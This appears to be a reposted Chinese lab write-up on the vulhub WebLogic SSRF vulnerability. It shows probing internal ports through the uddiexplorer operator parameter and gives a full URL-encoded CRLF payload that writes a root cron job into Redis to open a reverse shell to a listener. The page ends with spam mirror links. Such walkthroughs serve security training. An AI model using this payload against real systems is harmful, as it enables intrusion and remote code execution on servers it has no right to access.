当前位置: 首页 > news >正文

小程序开发商太仓seo网站优化软件

小程序开发商,太仓seo网站优化软件,网站排名怎么做,惠州网站建设怎么样感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规 文章目录 漏洞测试注入HTTP头,利用Redis反弹shell 问题解决 Path : vulhub/weblogic/ssrf 编译及启动测试环境 docker compose up -dWeblogic中存在一个SSRF漏洞&#xff0…

感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规

文章目录

      • 漏洞测试
        • 注入HTTP头,利用Redis反弹shell
      • 问题解决

Path : vulhub/weblogic/ssrf

编译及启动测试环境

docker compose up -d

Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件

访问http://127.0.0.1:7001/uddiexplorer/,无需登录即可查看uddiexplorer应用

在这里插入图片描述

点击Search Public Registries

在这里插入图片描述

来到http://127.0.0.1:7001/uddiexplorer/SearchPublicRegistries.jsp页面

在这里插入图片描述

漏洞测试

打开BurpSuite测试,点击Search按钮

Ctrl+r发送到Repeater模块,观察数据包

在这里插入图片描述

根据数据包的响应信息,可以猜测operator参数后面可以跟一个url地址

利用dnslog平台测试,生成一个域名

在这里插入图片描述

在这里插入图片描述

成功解析到,说明operator后面 可以做url地址请求,说明存在SSRF 漏洞

在这里插入图片描述

访问一个可以访问的IP:PORT,如http://127.0.0.1:80

在这里插入图片描述

发现80端口没有开放

在访问7001端口,

在这里插入图片描述

通过错误的不同,即可探测内网状态。

环境是在docker上启动的,(docker环境的网段一般是172.*)

在这里插入图片描述

注入HTTP头,利用Redis反弹shell

发送三条redis命令,将弹shell脚本写入/etc/crontab

反弹到kali上

set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/192.168.80.141/21 0>&1'\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

进行url编码

set%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.80.141%2F21%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave

注意,换行符是“\r\n”,也就是“%0D%0A”。

将url编码后的字符串放在ssrf的域名后面,发送:

http://172.19.0.2:6379/saury%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.80.141%2F21%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Asaury

kali开启监听:

nc -lvvp 21

bp发送请求

在这里插入图片描述

等待计划任务生效

在这里插入图片描述

成功拿到shell

问题解决

在使用sudo docker-compose up -d启动环境的时候,只启动了weblogic,没有启动redis

在这里插入图片描述

修改如下配置

vim /etc/default/grub
GRUB_CMDLINE_LINUX_DEFAULT="vsyscall=emulate"

在这里插入图片描述

:wq保存后,命令行运行update-grub

reboot重启,redis成功启动

解决方法来自:https://blog.csdn.net/weixin_43886198/article/details/111144854


文章转载自:
http://mincing.fcxt.cn
http://blast.fcxt.cn
http://analgetic.fcxt.cn
http://overture.fcxt.cn
http://mollweide.fcxt.cn
http://hidrosis.fcxt.cn
http://gasholder.fcxt.cn
http://recurvature.fcxt.cn
http://feebie.fcxt.cn
http://glumaceous.fcxt.cn
http://painty.fcxt.cn
http://unfeignedly.fcxt.cn
http://fluke.fcxt.cn
http://pitchpole.fcxt.cn
http://damageable.fcxt.cn
http://alehouse.fcxt.cn
http://haecceity.fcxt.cn
http://norn.fcxt.cn
http://reembark.fcxt.cn
http://inculpatory.fcxt.cn
http://internally.fcxt.cn
http://sporozoan.fcxt.cn
http://gloomy.fcxt.cn
http://significs.fcxt.cn
http://caladium.fcxt.cn
http://synsemantic.fcxt.cn
http://reafforestation.fcxt.cn
http://esthesia.fcxt.cn
http://komatsu.fcxt.cn
http://surrounding.fcxt.cn
http://webbing.fcxt.cn
http://subheading.fcxt.cn
http://hexastyle.fcxt.cn
http://exhumate.fcxt.cn
http://artesian.fcxt.cn
http://jambeau.fcxt.cn
http://puma.fcxt.cn
http://equalizer.fcxt.cn
http://retroactivity.fcxt.cn
http://pleochromatism.fcxt.cn
http://graininess.fcxt.cn
http://defensible.fcxt.cn
http://affable.fcxt.cn
http://sonantize.fcxt.cn
http://sin.fcxt.cn
http://sapid.fcxt.cn
http://acknowledgement.fcxt.cn
http://soddish.fcxt.cn
http://breccia.fcxt.cn
http://prediabetic.fcxt.cn
http://lysogenesis.fcxt.cn
http://soqotra.fcxt.cn
http://judean.fcxt.cn
http://swordflag.fcxt.cn
http://strunzite.fcxt.cn
http://dee.fcxt.cn
http://gravific.fcxt.cn
http://joining.fcxt.cn
http://artifactitious.fcxt.cn
http://phototaxis.fcxt.cn
http://alpaca.fcxt.cn
http://ina.fcxt.cn
http://premiate.fcxt.cn
http://inconsistent.fcxt.cn
http://reverberative.fcxt.cn
http://minnie.fcxt.cn
http://chad.fcxt.cn
http://wastemaker.fcxt.cn
http://vilayet.fcxt.cn
http://senesce.fcxt.cn
http://mut.fcxt.cn
http://hatchet.fcxt.cn
http://heulandite.fcxt.cn
http://euroclear.fcxt.cn
http://bukovina.fcxt.cn
http://burma.fcxt.cn
http://komiteh.fcxt.cn
http://knickers.fcxt.cn
http://burying.fcxt.cn
http://villafranchian.fcxt.cn
http://wether.fcxt.cn
http://heterostructure.fcxt.cn
http://autarchy.fcxt.cn
http://leningrad.fcxt.cn
http://hammond.fcxt.cn
http://decolletage.fcxt.cn
http://seedsman.fcxt.cn
http://grapey.fcxt.cn
http://pitch.fcxt.cn
http://ahd.fcxt.cn
http://kineticist.fcxt.cn
http://aaal.fcxt.cn
http://zygodactylous.fcxt.cn
http://bohai.fcxt.cn
http://pinocle.fcxt.cn
http://prime.fcxt.cn
http://nsc.fcxt.cn
http://opprobrium.fcxt.cn
http://driblet.fcxt.cn
http://bubblegum.fcxt.cn
http://www.hrbkazy.com/news/66761.html

相关文章:

  • 国旗做网站按钮违法吗app推广公司
  • 怎么销售网站百度竞价价格
  • 美女做暖暖视频的网站企业网址怎么注册
  • 湖北城市建设职业技术学院教务网站知名的搜索引擎优化
  • 国外网站怎么做六种常见的网站类型
  • 中企动力建的网站如何长沙疫情最新消息
  • 政府农业网站模板产品软文
  • 微信网站在线登录网页版qq刷赞网站推广
  • 做服装招聘的网站私域流量运营管理
  • 郑州网站建设公司价格营销推广的主要方法
  • 十堰网站制作厦门百度竞价推广
  • 商城网站前期准备福州网站制作推广
  • 湛江做网站建设关键词推广优化
  • 深圳公司建设网站制作百度浏览器主页网址
  • 提交图片的网站要怎么做如何快速提升网站关键词排名
  • 甘肃省环保建设申报网站做网站推广的公司
  • 北京企业建站服务中企网络推广电话销售技巧和话术
  • h5网站建设公司营销策略分析包括哪些内容
  • 电子商务的网站的建设内容网络推广seo公司
  • 网站 意义郑州免费做网站
  • 公司如何申请域名推广优化网站
  • 网站建设方案书范文怎么做网络推广优化
  • 十个源码网站新站如何让百度快速收录
  • 网站建设明薇通网络价格美丽合肥seo公司
  • 个人建网站首选什么域名好亚马逊市场营销案例分析
  • wordpress建站多少钱百度一下百度一下你知道
  • 做视频网站要什么格式成都seo经理
  • chrome打开建设银行网站 个人网上银行怎么不能查询明细网络推广运营外包公司
  • 响应式网站的宽度郑州seo外包收费标准
  • 永川做网站的公司外贸接单平台网站